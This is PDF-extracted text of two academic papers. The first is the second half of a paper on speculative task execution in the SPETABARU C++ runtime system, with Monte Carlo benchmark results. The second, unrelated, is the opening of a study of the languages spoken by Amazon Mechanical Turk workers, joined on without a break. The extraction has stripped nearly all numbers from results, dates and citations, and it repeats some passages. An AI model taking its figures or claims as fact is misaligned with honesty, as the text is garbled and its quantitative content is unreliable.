create_duplicate(t.data in write and do not exist in global_duplicates) g.add_copy_tasks(l .copy_tasks) // insert t as a normal task (inform g) g.set_main_task(t) internal_insert(t) // insert t as a speculative task using data duplicates, l and l and the global list (inform g) internal_speculative_insert(t, l , l ) // add select tasks and clean duplicates (inform g) select_tasks← create_select_tasks() g.add_select_tasks(select_tasks) // add l p in the global list global_duplicates.append(l p) end algorithms speculative task group the stg contains lists of tasks that are all connected to the same uncertain tasks’ results. it has a state, which can be undefined, enable or disable, and a result that indicates if one bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm : normal tasks insertion. function insert_normal_task(t) // clean the duplicate data handles if one is used in read mode and it is used by t not in read mode global_duplicates.clean_if_in_read(t.data in read) if no data used by t have been duplicated then // simply insert t, there is no speculation to do internal_insert(t) end else // find the spec-groups groups related to t groups← global_duplicates.find_spec_groups(t.data) if one of them is disabled then // we already know that the speculation has failed // remove the duplicates related to t global_duplicates.remove_any_kind(t.data) // insert t without speculation internal_insert(t) end else // build a new group with groups as parents g← create_group_with_parents(groups) // duplicate the data used by t in write mode that are not already duplicate (list l ) (inform g) l ← create_duplicate(t.data in write and do not exist in global_duplicates) // insert t as a normal task (inform g) g.set_main_task(t) internal_insert(t) // insert t as a speculative task using data duplicates, using l (inform g) internal_speculative_insert(t, l , l ) // add select tasks (use l ) and clean duplicates (inform g) select_tasks← create_select_tasks() g.add_select_tasks(select_tasks) end end of the uncertain tasks did write data. an stg also has a list of predecessor stgs and a list of successor stgs. in fact, if an stg is enabled and running and the uncertain task did not modify the data such that the speculation succeeded, then if a new tasks is inserted and uses data from this task group and another, they should be connected. task insertion in algorithm , we give an overview of the task insertion algorithm of an uncertain task, and in algorithm , we give that of a normal task. the algorithm uses a list called global_duplicates to save the duplicate data from the copy tasks inserted before the uncertain tasks. for instance, when a task is inserted, we can look up whether one of its dependencies has been duplicated or not. however, the difficulty arises from the construction at task insertion time, that is without a posteriori and without knowing what tasks will come next. therefore, in order to have executions as defined in ‘description’, we have to determine if there is a duplicate and if the related stgs have been disabled or failed. also, we need to create a duplicate of the data but without using them for the current task, which is why we store the duplicate information in some other lists before adding them to the global_duplicates after the task has been inserted. at execution during the execution, the rs has to decide if the speculation is enabled or not. it is convenient to do this when the first copy task of an stg becomes ready to be executed. in bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the project is open-source and available at https://gitlab.inria.fr/bramas/spetabaru. fact, the decision process can then use information such as the current number of ready tasks in the scheduler. then, the tasks have to be enabled or disabled accordingly. after any uncertain task has finished, the rs has to enable or disable tasks related to the stg. it has to iterate over the lists of the stg and, potentially, on its successor. the dag remains unchanged, and so any rs that has a callback and activation/deactivation features can implement our mechanism. implementation (spetabaru) we have implemented our speculation method on top of a lightweight c++ rs that was originally less than , lines. we use modern c++ and advanced meta-programming to look at data dependencies at compile time. the rs supports the data access modes of read, write, atomic_write, and commute (for commutative operations). we also use a dynamic array view, which allows for having an unlimited number of known dependencies at execution time. it is possible to use lambda/anonymous functions as tasks, as shown in code . // create the runtime const int numthreads = sputils::defaultnumthreads(); spruntime runtime(numthreads); const int initval = ; int writeval = ; // create a task with lambda function runtime.task(spread(initval), spwrite(writeval), [](const int& initvalparam, int& writevalparam){ writevalparam += initvalparam; }); // create a task with lambda function (that returns a bool) auto returnvalue = runtime.task(spread(initval), spwrite(writeval), [](const int& initvalparam, int& writevalparam) -> bool { writevalparam += initvalparam; return true; }); // wait completion of a single task returnvalue.wait(); // get the value of the task const bool res = returnvalue.getvalue(); // wait until two tasks (or less) remain runtime.waitremain( ); // wait for all tasks to be done runtime.waitalltasks(); // save trace and .dot runtime.generatetrace("/tmp/basis-trace.svg"); runtime.generatedot("/tmp/basis-dag.dot"); code : spetabaru example. the example of an uncertain task is given in code . compared to a regular task, the keyword spmaybewrite replaces spwrite and the function returns a boolean to inform the rs if a modification occurs. runtime.potentialtask(spmaybewrite(val), [](int& /*valparam*/) -> bool { return false; // val has not been modified }); code : example of creating an uncertain task in spetabaru. bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://gitlab.inria.fr/bramas/spetabaru https://peerj.com http://dx.doi.org/ . /peerj-cs. the current publication includes, as supplementary material, the bash script used to execute the simulations and to post-process the results, in addition to the full output of the executions. task a : write(val) task b uncertain : maybe-write(val) -> false task c uncertain : maybe-write(val) -> true task d : write(val) (a) description of the tasks. a b c d (b) dag without speculation. a sp-copy sp-copy b d' c' c (disabled) sp-select (disabled) sp-select d (c) dag with speculation. figure execution example with four tasks. b and c are uncertain tasks and here b did not write on the data, while c did. consequently, the rs has disabled or enabled the other tasks accordingly. full-size doi: . /peerjcs. /fig- execution example we show in figs. and two examples and their execution results. the description of the tasks we insert are given in figs. a and a, respectively. those descriptions also indicate the result of the uncertain tasks known during execution at the end of the tasks, where true means that the task writes on the data and that otherwise, it did not. the dags without speculation are given in figs. b and b, and the dags with speculation in figs. c and c, respectively. in fig. c, after b is executed, the rs knows that b did not change any data. therefore, it disables c and enables the merge. however, once c’ is complete, the rs knows that it wrote data. consequently, the rs must enable d and disable the merge. it also tried to disable d’ but the result visible on the dag indicates that this was too late. in fig. c, a more complex execution happened. since b did not write data, c has been disabled and the corresponding select has been enabled. however, since d and e did write data, then f and g have been enabled, and the two last selects have been disabled. performance study configuration software/hardware we used an intel xeon e - v with a frequency of . ghz and sockets of cores each. we compiled using the gnu compiler version . , and we bound the threads to the cores following a compact strategy, e.i. the threads are pinned to contiguous cores. we use spetabaru available on the public master branch at tag v . . bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. task a : write(val ),write(val ),write(val ) task b uncertain : maybe-write(val ) -> false task c uncertain : maybe-write(val ) -> true task d uncertain : maybe-write(val ) -> true task e uncertain : maybe-write(val ) -> true task f : ... write(val ),write(val ),write(val ) (a) description of the tasks. a b d e c f g (b) dag without speculation. a sp-copy sp-copy sp-copy sp-copyb f'd g' e c'c (disabled) sp-select (disabled) sp-select (disabled) f sp-select g (c) dag with speculation. figure execution example with seven tasks. b, c, d and e are uncertain tasks and here b did not write on the data, while c, d and e did. consequently, the rs has disabled or enabled the other tasks accordingly. full-size doi: . /peerjcs. /fig- test case we evaluated our approach on an mc simulation composed of five domains, where each domain had , particles. the reject/accept ratio was around . , and we executed the simulation for to iterations. we computed the lennard-jones potential between the particles to obtain the global energy. the moves (particle update) are a simple random distribution of the particles in the simulation box. for the remc, we used five replicas and performed a replica exchange every three iterations. the exchange rate between replicas was approximately . . execution times are obtained by doing the average of runs. the deviation is not given in the results because it is really limited (less than % in most cases). this is due to the kernels that are highly computational intensive with limited memory transfers, and because many threads remains idle for a significant amount of time during the execution, which help to get a limited contention effect. mc we compared three approaches: • task-based: we used the task-based execution as baseline. however, since there is no degree of parallelism between the iteration of the loops it is equivalent as a sequential execution. • speculative spec(t,s): here, t represents the number of threads and s the number of consecutive uncertain tasks inserted before inserting a normal task. the speculation is always enabled. • reject rej(t): here, t represents the number of threads and s the number of consecutive uncertain tasks inserted before inserting a normal task. in this configuration, we looked bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. total time = . s t h re a d t h re a d t h re a d t h re a d t h re a d s u b m it e d r e a d y a: task-based - iteration - . s total time = . s t h re a d t h re a d t h re a d t h re a d t h re a d s u b m it e d r e a d y b: spec(t= /s= ) - iteration - . s total time = . s t h r e a d t h r e a d t h r e a d t h r e a d t h r e a d s u b m it e d r e a d y c: rej(t= /s= ) - it- eration - . s total time = . s th re ad th re ad th re ad th re ad th re ad su bm ite d re ad y d: spec(t= /s= ) - iterations - . s total time = . s th re ad th re ad th re ad th re ad th re ad su bm ite d re ad y e: spec(t= /s= ) - iterations - . s figure execution traces of the mc simulation for different configurations. we compute one itera- tion in (a), (b) and (c). we compute two iterations in (d) and (e). legend: initial energy computation, move and energy recomputation, and speculative move and energy recomputation. full-size doi: . /peerjcs. /fig- at the performance when all changes are rejected to provide a reference as possible speedup if all the speculations were successful. this is not a realistic execution for an mc simulation because it would mean that all moves are rejected. the speculation is always enabled. the tasks are created such that they represent one iteration of the loop line in algorithm . they include the move, the computation of the energy and the test for acceptance for a single domain. consequently, each task accesses in maybe write the energy matrix and one of the domains, and in read all the other domains. we show in fig. the execution trace to compute one or two iterations, where each of the five domains are moved once per iteration. figure a is simply giving the baseline with a task-based execution, but since there is no parallelism we obtain a sequential execution on multiple cores. in fig. b, we see that a normal move/computation task is executed together with four speculative tasks. we can see that the first move was rejected but not the second one. therefore, the process continued by computing the normal last three moves. in fig. c, we see what would be the execution if all the moves were rejected. in such case, all speculation would be correct and only one normal task would be computed. in fig. d, we compute two iterations but the × uncertain move/computations were inserted consecutively. consequently, as the second move is rejected, the following eight moves/computations have to be computed normally. to avoid this huge penalty, we can bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. reduce the number of consecutive tasks we insert as shown in fig. e. here, we restart a new speculative process at each iteration, which limits the degree of parallelization to five (the number of domains) but avoids canceling a complete set of speculative tasks. this means that in the code we manually insert an normal task instead of what could have been a uncertain task to ensure restarting a speculation process afterward. in fig. a, we provide the performance result for the mc simulation. we look at the gain in performance by using speculation but also at the difference for the speculation degree. we see that as the number of iterations increases, the speedup stabilizes around %, which is above the theoretical result for a probability of . provided in table . similarly, the upper bound rej(t= /s= ) gets closer to five. remc we compare three approaches: • task-based: since there is no degree of parallelism inside the mc, the maximum parallelism in obtained through the concurrency between replicas. • speculative spec(t,s): here, t represents the number of threads and s the number of consecutive uncertain tasks inserted before inserting a normal task. the speculation is always enabled. • reject rej(t): here, t represents the number of threads and s the number of consecutive uncertain tasks inserted before inserting a normal task. in this configuration, we look at the performance when all changes are rejected to provide a reference as possible speedup if all the speculations were successful. this is not a realistic execution for an mc simulation. the speculation is always enabled. since using speculation creates more work and more tasks to compute, we see that enabling the speculation in all cases could lead to an overhead. this is illustrated in fig. a by the configuration spec(t= /s= ). however, using more threads allows better performance, as shown by configurations spec(t= /*) and spec(t= /*). in terms of speedup, increasing the number of consecutive speculative tasks does not improve the performance. for instance, s= is always faster because the speculation succeed with a probability of only . (see fig. b). of course, we see that having more threads increases the all reject configuration rej performance, and more precisely the more threads we have the faster it executes. conclusion in the current paper, we provided the first results of using speculation in task-based rs’s. we described a general pattern and the algorithm of a predictive-oriented approach. our rs, spetabaru, is able to execute speculative task flows, and we demonstrate that the obtained speedup for both the mc and remc is close to the theoretical one of %, when the probability to accept changes is / . the mechanism we proposed can be easily incorporated in any other runtime system. however, the fact that we used the c++ language is an important asset because it makes it possible to generate functions capable of copying bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. number of iterations t im e (s ) task-based spec(t= /s= ) spec(t= /s= ) spec(t= /s= ) spec(t= /s= ) spec(t= /s= ) rej(t= /s= ) (a) execution time . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . number of iterations s pe ed up spec(t= /s= ) spec(t= /s= ) spec(t= /s= ) spec(t= /s= ) spec(t= /s= ) rej(t= ) (b) speedup over the task-based executions figure . performance for the mc simulation with domains. spec(t= /*) and spec(t= /*). in terms of speedup, increasing the number of consecutive speculative tasks does not improve the performance. for instance, s= is always faster because the speculation succeed with a probability of only . (see fig. b). of course, we see that having more threads increases the all reject configuration rej performance, and more precisely the more threads we have the faster it executes. / peerj comput. sci. reviewing pdf | (cs- : : : : :new feb ) manuscript to be reviewedcomputer science figure performance for the mc simulation with five domains. (a) execution time; (b) speedup over the task-based executions. full-size doi: . /peerjcs. /fig- bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. number of iterations t im e (s ) task-based (t= ) spec(t= /s= ) spec(t= /s= ) spec(t= /s= ) rej(t= /s= ) spec(t= /s= ) spec(t= /s= ) rej(t= /s= ) (a) execution time . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . number of iterations s pe ed up spec(t= /s= ) spec(t= /s= ) spec(t= /s= ) rej(t= /s= ) spec(t= /s= ) spec(t= /s= ) rej(t= /s= ) (b) speedup over the task-based executions figure . performance for the remc simulation with replicas and domains per replica. conclusion in the current paper, we provided the first results of using speculation in task-based rs’s. we described a general pattern and the algorithm of a predictive-oriented approach. our rs, spetabaru, is able to execute speculative task flows, and we demonstrate that the obtained speedup for both the mc and remc is close to the theoretical one of %, when the probability to accept changes is / . the mechanism we proposed can be easily incorporated in any other runtime system. however, the fact that we used the c++ language is an important asset because it makes it possible to generate functions capable of copying / peerj comput. sci. reviewing pdf | (cs- : : : : :new feb ) manuscript to be reviewedcomputer science figure performance for the remc simulation with five replicas and five domains per replica. (a) execution time; (b) speedup over the task-based executions. full-size doi: . /peerjcs. /fig- (selecting) user’s data. the implementation of our system using a low-level language would require using advanced programming from the user perspective such as function pointers. the number of failures can reduce the benefits and, in the worst case, lead to underperformance when the runtime generates too many tasks for the available cpu bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. cores. in addition, our system uses duplication of data such that memory limits could be reached if the system is not used carefully. for these reasons, as perspective, we would like to address three major points. first, we would like to automatically limit the degree of speculation (the number of consecutive uncertain tasks). then, we would like to implement the eager approach to speculate again after a failure in a stg and to obtain a speedup of for mc/remc simulations. finally, we would like to study the speculation/decision formula. the resulting process should look at the available ready tasks as the number of threads and certainly use a historical model of the previous execution to predict cleverly if enabling the speculation is appropriate. this will allow removing the possible overhead of the speculation when there is no need to increase the degree of parallelism at some points of the execution. acknowledgements work by berenger bramas was partially done at the max planck computing and data facility (mpcdf), garching, germany. experiments presented in this paper were carried out using the plafrim experimental testbed, supported by inria, cnrs (labri and imb), université de bordeaux, bordeaux inp and conseil régional d’aquitaine additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • bérenger bramas conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: data is available at github: https://gitlab.inria.fr/bramas/spetabaru. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references agullo e, aumage o, bramas b, coulaud o, pitoiset s. . bridging the gap between openmp and task-based runtime systems for the fast multipole method. bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://gitlab.inria.fr/bramas/spetabaru http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. ieee transactions on parallel and distributed systems ( ): – doi . /tpds. . . agullo e, bramas b, coulaud o, darve e, messner m, takahashi t. a. task-based fmm for heterogeneous architectures. concurrency and computation: practice and experience ( ): – doi . /cpe. . agullo e, buttari a, guermouche a, lopez f. b. implementing multifrontal sparse solvers for multicore architectures with sequential task flow runtime systems. acm transactions on mathematical software ( ): : – : doi . / . altekar g, dwarkadas s, huelsenbeck jp, ronquist f. . parallel metropolis coupled markov chain monte carlo for bayesian phylogenetic inference. bioinformatics ( ): – doi . /bioinformatics/btg . apollo. . apollo—automatic speculative polyhedral loop optimizer. available at http://apollo.gforge.inria.fr/ . augonnet c, thibault s, namyst r, wacrenier p-a. . starpu: a unified platform for task scheduling on heterogeneous multicore architectures. concurrency and computation: practice and experience ( ): – doi . /cpe. . ayguadé e, copty n, duran a, hoeflinger j, lin y, massaioli f, teruel x, unnikrish- nan p, zhang g. . the design of openmp tasks. ieee transactions on parallel and distributed systems ( ): – doi . /tpds. . . bauer m, treichler s, slaughter e, aiken a. . legion: expressing locality and independence with logical regions. in: international conference on high performance computing, networking, storage and analysis. piscataway: ieee, . blumofe rd, joerg cf, kuszmaul bc, leiserson ce, randall kh, zhou y. . cilk: an efficient multithreaded runtime system. journal of parallel and distributed computing ( ): – doi . /jpdc. . . chronaki k, casas m, moreto m, bosch j, badia rm. . taskgenx: a hardware- software proposal for accelerating task parallelism. in: yokota r, weiland m, keyes d, trinitis c, eds. high performance computing. cham: springer international publishing, – . cosnard m, loi m. . automatic task graph generation techniques. in: proceedings of the twenty-eighth annual hawaii international conference on system sciences, vol. . piscataway: ieee, – doi . /hicss. . . danalis a, bosilca g, bouteiller a, herault t, dongarra j. . ptg: an abstraction for unhindered parallelism. in: proceedings of the fourth international workshop on domain-specific languages and high-level frameworks for high performance computing, (wolfhpc). piscataway: ieee, – doi . /wolfhpc. . . duran a, ayguadé e, badia rm, labarta j, martinell l, martorell x, planas j. . ompss: a proposal for programming heterogeneous multi-core architectures. parallel processing letters ( ): – doi . /s . gautier t, lima jv, maillard n, raffin b. . xkaapi: a runtime system for data- flow task programming on heterogeneous architectures. in: parallel & distributed processing (ipdps), ieee th international symposium on. piscataway: ieee, – doi . /ipdps. . . bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tpds. . http://dx.doi.org/ . /cpe. http://dx.doi.org/ . / http://dx.doi.org/ . /bioinformatics/btg http://apollo.gforge.inria.fr/ http://dx.doi.org/ . /cpe. http://dx.doi.org/ . /tpds. . http://dx.doi.org/ . /jpdc. . http://dx.doi.org/ . /hicss. . http://dx.doi.org/ . /wolfhpc. . http://dx.doi.org/ . /s http://dx.doi.org/ . /ipdps. . http://dx.doi.org/ . /peerj-cs. gross j, janke w, bachmann m. . a gpu approach to parallel replica-exchange polymer simulations. physics procedia : – doi . /j.phpro. . . . intel. a. intel cilk plus. available at https://www.cilkplus.org/ . intel. b. threading building blocks (tbb). available at https://www.threadingbuildingblocks.org/ . jeffrey mc, subramanian s, yan c, emer j, sanchez d. . a scalable archi- tecture for ordered parallelism. in: microarchitecture (micro), th annual ieee/acm international symposium on. piscataway: ieee, – doi . / . . kale lv, krishnan s. . charm++: a portable concurrent object oriented system based on c++. in: acm sigplan notices. vol. . new york: acm, – . kim yc, hummer g. . coarse-grained models for simulations of multipro- tein complexes: application to ubiquitin binding. journal of molecular biology ( ): – doi . /j.jmb. . . . leiserson ce. . the cilk++ concurrency platform. in: th acm/ieee design automation conference, . dac’ . piscataway: ieee, – . martinez caamaño jm, selva m, clauss p, baloian a, wolff w. . full runtime polyhedral optimizing loop transformations with the generation, instantiation, and scheduling of code-bones. concurrency and computation: practice and experience ( ):e doi . /cpe. . openmp architecture review board. . openmp fortran application program interface . . available at http://www.openmp.org/wp-content/uploads/fspec .pdf . openmp architecture review board. . openmp application program interface version . . available at http://www.openmp.org/wp-content/uploads/spec .pdf . openmp architecture review board. . openmp application program interface version . . available at http://www.openmp.org/wp-content/uploads/openmp . . .pdf . perez jm, badia rm, labarta j. . a dependency-aware task-based programming environment for multi-core architectures. in: cluster computing, ieee interna- tional conference on. piscataway: ieee, – doi . /clustr. . . salamanca j, amaral jn, araujo g. . using hardware-transactional-memory support to implement thread-level speculation. in: ieee transactions on parallel and distributed systems. piscataway: ieee. steffan jg, mowry tc. . the potential for using thread-level data speculation to facilitate automatic parallelization. in: high-performance computer architecture, . proceedings., fourth international symposium on. piscataway: ieee, – doi . /hpca. . . tagliavini g, cesarini d, marongiu a. . unleashing fine-grained paral- lelism on embedded many-core accelerators with lightweight openmp task- ing. ieee transactions on parallel and distributed systems ( ): – doi . /tpds. . . bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.phpro. . . https://www.cilkplus.org/ https://www.threadingbuildingblocks.org/ http://dx.doi.org/ . / . http://dx.doi.org/ . /j.jmb. . . http://dx.doi.org/ . /cpe. http://www.openmp.org/wp-content/uploads/fspec .pdf http://www.openmp.org/wp-content/uploads/spec .pdf http://www.openmp.org/wp-content/uploads/openmp . . .pdf http://www.openmp.org/wp-content/uploads/openmp . . .pdf http://dx.doi.org/ . /clustr. . http://dx.doi.org/ . /hpca. . http://dx.doi.org/ . /tpds. . http://dx.doi.org/ . /peerj-cs. thachuk c, shmygelska a, hoos hh. . a replica exchange monte carlo al- gorithm for protein folding in the hp model. bmc bioinformatics ( ): doi . / - - - . thoman p, dichev k, heller t, iakymchuk r, aguilar x, hasanov k, gschwandtner p, lemarinier p, markidis s, jordan h, fahringer t, katrinis k, laure e, nikolopou- los ds. . a taxonomy of task-based parallel programming technologies for high- performance computing. the journal of supercomputing ( ): – . tillenius m. . superglue: a shared memory framework using data versioning for dependency-aware task-based parallelization. siam journal on scientific computing ( ):c –c doi . / . treikalis a, merzky a, chen h, lee t-s, york dm, jha s. . repex: a flexible framework for scalable replica exchange molecular dynamics simulations. in: parallel processing (icpp), th international conference on. piscataway: ieee, – doi . /icpp. . . zhou c, lang x, wang y, zhu c, lu z, chi x. . parallel metropolis coupled markov chain monte carlo for isolation with migration model. applied mathematics & information sciences ( l): – doi . /amis/ l . bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - http://dx.doi.org/ . / http://dx.doi.org/ . /icpp. . http://dx.doi.org/ . /amis/ l http://dx.doi.org/ . /peerj-cs. the language demographics of amazon mechanical turk the language demographics of amazon mechanical turk ellie pavlick matt post ann irvine dmitry kachaev chris callison-burch , computer and information science department, university of pennsylvania human language technology center of excellence, johns hopkins university abstract we present a large scale study of the languages spoken by bilingual workers on mechanical turk (mturk). we establish a methodology for determining the language skills of anony- mous crowd workers that is more robust than simple surveying. we validate workers’ self- reported language skill claims by measuring their ability to correctly translate words, and by geolocating workers to see if they reside in countries where the languages are likely to be spoken. rather than posting a one-off survey, we posted paid tasks consisting of , as- signments to translate a total of , words in each of languages. our study ran for several months, and was highly visible on the mturk crowdsourcing platform, increas- ing the chances that bilingual workers would complete it. our study was useful both to cre- ate bilingual dictionaries and to act as cen- sus of the bilingual speakers on mturk. we use this data to recommend languages with the largest speaker populations as good candidates for other researchers who want to develop crowdsourced, multilingual technologies. to further demonstrate the value of creating data via crowdsourcing, we hire workers to create bilingual parallel corpora in six indian lan- guages, and use them to train statistical ma- chine translation systems. overview crowdsourcing is a promising new mechanism for collecting data for natural language processing re- search. access to a fast, cheap, and flexible work- force allows us to collect new types of data, poten- tially enabling new language technologies. because crowdsourcing platforms like amazon mechanical turk (mturk) give researchers access to a world- wide workforce, one obvious application of crowd- sourcing is the creation of multilingual technologies. with an increasing number of active crowd workers located outside of the united states, there is even the potential to reach fluent speakers of lower resource languages. in this paper, we investigate the feasi- bility of hiring language informants on mturk by conducting the first large-scale demographic study of the languages spoken by workers on the platform. there are several complicating factors when try- ing to take a census of workers on mturk. the workers’ identities are anonymized, and amazon provides no information about their countries of ori- gin or their language abilities. posting a simple sur- vey to have workers report this information may be inadequate, since (a) many workers may never see the survey, (b) many opt not to do one-off surveys since potential payment is low, and (c) validating the answers of respondents is not straightforward. our study establishes a methodology for deter- mining the language demographics of anonymous crowd workers that is more robust than simple sur- veying. we ask workers what languages they speak and what country they live in, and validate their claims by measuring their ability to correctly trans- late words and by recording their geolocation. to increase the visibility and the desirability of our tasks, we post , assignments in each of lan- guages. these tasks each consist of translating foreign words into english. two of the words have known translations, allowing us to validate that the workers’ translations are accurate. we construct bilingual dictionaries with up to , entries, with the majority of entries being new. surveying thousands of workers allows us to ana- lyze current speaker populations for languages. transactions of the association for computational linguistics, ( ) – . action editor: mirella lapata. submitted / ; published / . c© association for computational linguistics. / / turkermap.html file:///users/ellie/documents/research/turker-demographics/code/src/ /paper-rewrite/turkermap.html / , , , figure : the number of workers per country. this map was generated based on geolocating the ip address of , workers in our study. omitted are workers who were located in more than one country during the study, and workers who could not be geolocated. the size of the circles represents the number of workers from each country. the two largest are india ( , workers) and the united states ( ). to calibrate the sizes: the philippines has workers, egypt has , russia has , and sri lanka has . the data also allows us to answer questions like: how quickly is work completed in a given language? are crowdsourced translations reliably good? how often do workers misrepresent their language abili- ties to obtain financial rewards? background and related work amazon’s mechanical turk (mturk) is an on- line marketplace for work that gives employers and researchers access to a large, low-cost work- force. mturk allows employers to provide micro- payments in return for workers completing micro- tasks. the basic units of work on mturk are called ‘human intelligence tasks’ (hits). mturk was de- signed to accommodate tasks that are difficult for computers, but simple for people. this facilitates research into human computation, where people can be treated as a function call (von ahn, ; little et al., ; quinn and bederson, ). it has appli- cation to research areas like human-computer inter- action (bigham et al., ; bernstein et al., ), computer vision (sorokin and forsyth, ; deng et al., ; rashtchian et al., ), speech pro- cessing (marge et al., ; lane et al., ; parent and eskenazi, ; eskenazi et al., ), and natu- ral language processing (snow et al., ; callison- burch and dredze, ; laws et al., ). on mturk, researchers who need work completed are called ‘requesters’, and workers are often re- ferred to as ‘turkers’. mturk is a true market, mean- ing that turkers are free to choose to complete the hits which interest them, and requesters can price their tasks competitively to try to attract workers and have their tasks done quickly (faridani et al., ; singer and mittal, ). turkers remain anony- mous to requesters, and all payment occurs through amazon. requesters are able to accept submitted work or reject work that does not meet their stan- dards. turkers are only paid if a requester accepts their work. several reports examine mechanical turk as an economic market (ipeirotis, a; lehdonvirta and ernkvist, ). when amazon introduced mturk, it first offered payment only in amazon credits, and later offered direct payment in us dollars. more re- cently, it has expanded to include one foreign cur- rency, the indian rupee. despite its payments be- ing limited to two currencies or amazon credits, mturk claims over half a million workers from countries (amazon, ). this suggests that its worker population should represent a diverse set of languages. a demographic study by ipeirotis ( b) fo- cused on age, gender, martial status, income lev- els, motivation for working on mturk, and whether workers used it as a primary or supplemental form of income. the study contrasted indian and us workers. ross et al. ( ) completed a longitudi- nal follow-on study. a number of other studies have informally investigated turkers’ language abilities. munro and tily ( ) compiled survey responses of , turkers, revealing that four of the six most represented languages come from india (the top six being hindi, malayalam, tamil, spanish, french, and telugu). irvine and klementiev ( ) had turkers evaluate the accuracy of translations that had been automatically inducted from monolingual texts. they examined translations of words in low-resource languages, and reported geolocated countries for their workers (india, the us, romania, pakistan, macedonia, latvia, bangladesh and the philippines). irvine and klementiev discussed the difficulty of quality control and assessing the plausi- bility of workers’ language skills for rare languages, which we address in this paper. several researchers have investigated using mturk to build bilingual parallel corpora for ma- chine translation, a task which stands to benefit low cost, high volume translation on demand (ger- mann, ). ambati et al. ( ) conducted a pilot study by posting sentences to mturk for span- ish, chinese, hindi, telugu, urdu, and haitian cre- ole. in a study of urdu sentences, zaidan and callison-burch ( ) presented methods for achieving professional-level translation quality from turkers by soliciting multiple english translations of each foreign sentence. zbib et al. ( ) used crowdsourcing to construct a . million word par- allel corpus of dialect arabic and english, train- ing a statistical machine translation system that pro- duced higher quality translations of dialect arabic than a system a trained on times more mod- ern standard arabic-english parallel data. zbib et al. ( ) conducted a systematic study that showed that training an mt system on crowdsourced trans- lations resulted in the same performance as training on professional translations, at the cost. hu et al. ( ; hu et al. ( ) performed crowdsourced translation by having monolingual speakers collab- orate and iteratively improve mt output. english tamil malayalam hindi spanish telugu chinese romanian portuguese arabic kannada german french polish urdu tagalog marathi russian italian bengali gujarati hebrew dutch turkish vietnamese macedonian cebuano swedish bulgarian swahili hungarian catalan thai lithuanian punjabi others ≤ table : self-reported native language of , bilingual turkers. not shown are languages with ≤ speakers. we omit , turkers who did not report their native language, who reported na- tive languages, and with ≥ native languages. several researchers have examined cost optimiza- tion using active learning techniques to select the most useful sentences or fragments to translate (am- bati and vogel, ; bloodgood and callison- burch, ; ambati, ). to contrast our research with previous work, the main contributions of this paper are: ( ) a robust methodology for assessing the bilingual skills of anonymous workers, ( ) the largest-scale census to date of language skills of workers on mturk, and ( ) a detailed analysis of the data gathered in our study. experimental design the central task in this study was to investigate me- chanical turk’s bilingual population. we accom- plished this through self-reported surveys combined with a hit to translate individual words for languages. we evaluate the accuracy of the work- ers’ translations against known translations. in cases where these were not exact matches, we used a sec- ond pass monolingual hit, which asked english speakers to evaluate if a worker-provided translation was a synonym of the known translation. demographic questionnaire at the start of each hit, turkers were asked to complete a brief survey about their language abilities. the survey asked the following questions: • is [language] your native language? • how many years have you spoken [language]? • is english your native language? • how many years have you spoken english? • what country do you live in? we automatically collected each worker’s current lo- cation by geolocating their ip address. a total of , unique workers completed our hits. of these, , provided answers to our survey questions, and we were able to geolocate , . figure plots the location of workers across countries. table gives the most common self-reported native lan- guages. selection of languages we drew our data from the different language versions of wikipedia. we se- lected the languages with the largest number of articles (table ). for each language, we chose the , most viewed articles over a year period, and extracted the , most frequent words from them. the resulting vocabularies served as the input to our translation hit. translation hit for the translation task, we asked turkers to translate individual words. we showed each word in the context of three sentences that were drawn from wikipedia. turkers were al- lowed to mark that they were unable to translate a word. each task contained words, of which were words with unknown translations, and of which were quality control words with known trans- lations. we gave special instruction for translat- ing names of people and places, giving examples of how to handle ‘barack obama’ and ‘australia’ using their interlanguage links. for languages with non-latin alphabets, names were transliterated. the task paid $ . for the translation of words. each set of words was independently translated by three separate workers. , workers completed , translation assignments, totaling more than million words, over a period of three and a half months. gold standard translations a set of gold stan- dard translations were automatically harvested from http://meta.wikimedia.org/wiki/list_of_ wikipedias http://dumps.wikimedia.org/other/ pagecounts-raw/ k+ articles: german (de), english (en), spanish (es), french (fr), italian (it), japanese (ja), dutch (nl), polish (pl), portuguese (pt), russian (ru) k- k articles: arabic (ar), bulgarian (bg), catalan (ca), czech (cs), danish (da), esperanto (eo), basque (eu), persian (fa), finnish (fi), hebrew (he), hindi (hi), croatian (hr), hungarian (hu), indonesian (id), korean (ko), lithuanian (lt), malay (ms), norwe- gian (bokmal) (no), romanian (ro), slovak (sk), slovenian (sl), ser- bian (sr), swedish (sv), turkish (tr), ukrainian (uk), 